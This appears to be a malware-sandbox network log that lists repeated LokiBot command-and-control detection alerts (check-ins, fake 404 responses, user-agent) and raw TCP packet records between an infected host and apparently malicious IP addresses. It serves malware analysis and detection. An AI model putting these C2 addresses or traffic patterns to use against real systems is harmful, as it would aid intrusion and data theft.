2024-10-25T19:52:08.794009+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-25T19:52:08.794009+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-25T19:52:08.800242+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49190	TCP
2024-10-25T19:52:08.973694+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-25T19:52:08.973694+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-25T19:52:08.973694+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-25T19:52:10.025133+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-25T19:52:10.025133+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49191	94.156.177.220	80	TCP
2024-10-25T19:52:10.031535+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49191	TCP
2024-10-25T19:52:10.380036+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-25T19:52:10.380036+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-25T19:52:10.380036+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-25T19:52:11.347349+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-25T19:52:11.347349+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49192	94.156.177.220	80	TCP
2024-10-25T19:52:11.356894+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49192	TCP
2024-10-25T19:52:12.508412+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-25T19:52:12.508412+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-25T19:52:12.508412+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-25T19:52:13.456769+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-25T19:52:13.456769+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49193	94.156.177.220	80	TCP
2024-10-25T19:52:13.462575+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49193	TCP
2024-10-25T19:52:13.973613+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-25T19:52:13.973613+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-25T19:52:13.973613+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-25T19:52:14.951162+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-25T19:52:14.951162+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49194	94.156.177.220	80	TCP
2024-10-25T19:52:14.956948+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49194	TCP
2024-10-25T19:52:15.125319+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-25T19:52:15.125319+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-25T19:52:15.125319+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-25T19:52:16.081321+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-25T19:52:16.081321+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49195	94.156.177.220	80	TCP
2024-10-25T19:52:16.087518+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49195	TCP
2024-10-25T19:52:16.242299+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-25T19:52:16.242299+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-25T19:52:16.242299+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-25T19:52:17.297037+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-25T19:52:17.297037+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49196	94.156.177.220	80	TCP
2024-10-25T19:52:17.330751+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49196	TCP
2024-10-25T19:52:17.452452+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-25T19:52:17.452452+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-25T19:52:17.452452+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-25T19:52:18.438249+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-25T19:52:18.438249+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49197	94.156.177.220	80	TCP
2024-10-25T19:52:18.444630+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49197	TCP
2024-10-25T19:52:18.588953+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-25T19:52:18.588953+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-25T19:52:18.588953+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-25T19:52:19.554707+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-25T19:52:19.554707+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49198	94.156.177.220	80	TCP
2024-10-25T19:52:19.560466+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49198	TCP
2024-10-25T19:52:19.696573+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-25T19:52:19.696573+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-25T19:52:19.696573+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-25T19:52:20.719023+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-25T19:52:20.719023+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49199	94.156.177.220	80	TCP
2024-10-25T19:52:20.735097+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49199	TCP
2024-10-25T19:52:20.864617+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-25T19:52:20.864617+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-25T19:52:20.864617+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-25T19:52:21.835784+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-25T19:52:21.835784+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49200	94.156.177.220	80	TCP
2024-10-25T19:52:21.842413+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49200	TCP
2024-10-25T19:52:21.996703+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-25T19:52:21.996703+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-25T19:52:21.996703+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-25T19:52:22.953058+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-25T19:52:22.953058+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49201	94.156.177.220	80	TCP
2024-10-25T19:52:22.959303+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49201	TCP
2024-10-25T19:52:23.143979+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-25T19:52:23.143979+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-25T19:52:23.143979+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-25T19:52:24.369508+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-25T19:52:24.369508+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49202	94.156.177.220	80	TCP
2024-10-25T19:52:24.370764+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49202	TCP
2024-10-25T19:52:24.540108+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-25T19:52:24.540108+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-25T19:52:24.540108+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-25T19:52:25.510015+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-25T19:52:25.510015+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49203	94.156.177.220	80	TCP
2024-10-25T19:52:25.516183+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49203	TCP
2024-10-25T19:52:25.739974+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-25T19:52:25.739974+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-25T19:52:25.739974+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-25T19:52:26.666693+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-25T19:52:26.666693+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49204	94.156.177.220	80	TCP
2024-10-25T19:52:26.672545+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49204	TCP
2024-10-25T19:52:26.830845+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49205	94.156.177.220	80	TCP
2024-10-25T19:52:26.830845+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49205	94.156.177.220	80	TCP
2024-10-25T19:52:26.830845+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49205	94.156.177.220	80	TCP
2024-10-25T19:52:27.802867+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49205	94.156.177.220	80	TCP
2024-10-25T19:52:27.802867+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49205	94.156.177.220	80	TCP
2024-10-25T19:52:27.808891+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49205	TCP
2024-10-25T19:52:27.960200+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49206	94.156.177.220	80	TCP
2024-10-25T19:52:27.960200+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49206	94.156.177.220	80	TCP
2024-10-25T19:52:27.960200+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49206	94.156.177.220	80	TCP
2024-10-25T19:52:28.944599+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49206	94.156.177.220	80	TCP
2024-10-25T19:52:28.944599+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49206	94.156.177.220	80	TCP
2024-10-25T19:52:28.951444+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49206	TCP
2024-10-25T19:52:29.089465+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49207	94.156.177.220	80	TCP
2024-10-25T19:52:29.089465+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49207	94.156.177.220	80	TCP
2024-10-25T19:52:29.089465+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49207	94.156.177.220	80	TCP
2024-10-25T19:52:30.087566+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49207	94.156.177.220	80	TCP
2024-10-25T19:52:30.087566+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49207	94.156.177.220	80	TCP
2024-10-25T19:52:30.093255+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49207	TCP
2024-10-25T19:52:30.239136+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49208	94.156.177.220	80	TCP
2024-10-25T19:52:30.239136+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49208	94.156.177.220	80	TCP
2024-10-25T19:52:30.239136+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49208	94.156.177.220	80	TCP
2024-10-25T19:52:31.199980+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49208	94.156.177.220	80	TCP
2024-10-25T19:52:31.199980+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49208	94.156.177.220	80	TCP
2024-10-25T19:52:31.205724+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49208	TCP
2024-10-25T19:52:31.348968+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49209	94.156.177.220	80	TCP
2024-10-25T19:52:31.348968+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49209	94.156.177.220	80	TCP
2024-10-25T19:52:31.348968+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49209	94.156.177.220	80	TCP
2024-10-25T19:52:32.292784+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49209	94.156.177.220	80	TCP
2024-10-25T19:52:32.292784+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49209	94.156.177.220	80	TCP
2024-10-25T19:52:32.298660+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49209	TCP
2024-10-25T19:52:32.440484+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49210	94.156.177.220	80	TCP
2024-10-25T19:52:32.440484+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49210	94.156.177.220	80	TCP
2024-10-25T19:52:32.440484+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49210	94.156.177.220	80	TCP
2024-10-25T19:52:33.404037+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49210	94.156.177.220	80	TCP
2024-10-25T19:52:33.404037+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49210	94.156.177.220	80	TCP
2024-10-25T19:52:33.410305+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49210	TCP
2024-10-25T19:52:33.550208+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49211	94.156.177.220	80	TCP
2024-10-25T19:52:33.550208+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49211	94.156.177.220	80	TCP
2024-10-25T19:52:33.550208+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49211	94.156.177.220	80	TCP
2024-10-25T19:52:34.518597+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49211	94.156.177.220	80	TCP
2024-10-25T19:52:34.518597+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49211	94.156.177.220	80	TCP
2024-10-25T19:52:34.524336+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49211	TCP
2024-10-25T19:52:34.679063+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49212	94.156.177.220	80	TCP
2024-10-25T19:52:34.679063+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49212	94.156.177.220	80	TCP
2024-10-25T19:52:34.679063+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49212	94.156.177.220	80	TCP
2024-10-25T19:52:35.658929+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49212	94.156.177.220	80	TCP
2024-10-25T19:52:35.658929+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49212	94.156.177.220	80	TCP
2024-10-25T19:52:35.664690+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49212	TCP
2024-10-25T19:52:36.585142+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49213	94.156.177.220	80	TCP
2024-10-25T19:52:36.585142+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49213	94.156.177.220	80	TCP
2024-10-25T19:52:36.585142+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49213	94.156.177.220	80	TCP
2024-10-25T19:52:37.678244+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49213	94.156.177.220	80	TCP
2024-10-25T19:52:37.678244+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49213	94.156.177.220	80	TCP
2024-10-25T19:52:37.684229+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49213	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 25, 2024 19:50:44.200694084 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:44.200723886 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:44.200778961 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:44.207194090 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:44.207204103 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:44.849755049 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:44.849992990 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:44.857059002 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:44.857074976 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:44.857430935 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:44.857484102 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:44.960119009 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:45.003325939 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:45.769644022 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:45.769843102 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:45.769876003 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:45.770153999 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:45.777189970 CEST	49163	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:50:45.777214050 CEST	443	49163	188.114.97.3	192.168.2.22
Oct 25, 2024 19:50:45.805862904 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:45.811784029 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:45.811856985 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:45.811971903 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:45.817950010 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.487555981 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.487637997 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.487654924 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.487667084 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.487675905 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.487698078 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.487766981 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.487777948 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.487797976 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.487811089 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.487890005 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.487926006 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.487935066 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.487946033 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.487967968 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.487977982 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.487993956 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.487999916 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.488034964 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.493204117 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.493267059 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.493309021 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.493343115 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.493410110 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.493452072 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.518045902 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.606508017 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.606540918 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.606554031 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.606564999 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.606581926 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.606587887 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.606599092 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.606614113 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.606623888 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.606651068 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.606848955 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.606884956 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.607196093 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.607208967 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.607222080 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.607233047 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.607239962 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.607270956 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.607276917 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.607640982 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.607676983 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.607695103 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.607707024 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.607724905 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.607734919 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.607743025 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.607753992 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.607770920 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.607785940 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.608542919 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.608555079 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.608588934 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.608694077 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.608705044 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.608717918 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.608732939 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.608752012 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.609392881 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.609428883 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.609442949 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.609448910 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.609483004 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.609494925 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.612703085 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.612734079 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.612760067 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.612776041 CEST	49164	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:46.730072021 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730097055 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730114937 CEST	80	49164	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:46.730133057 CEST	80	49164	192.3.176.141	192.168.2.22
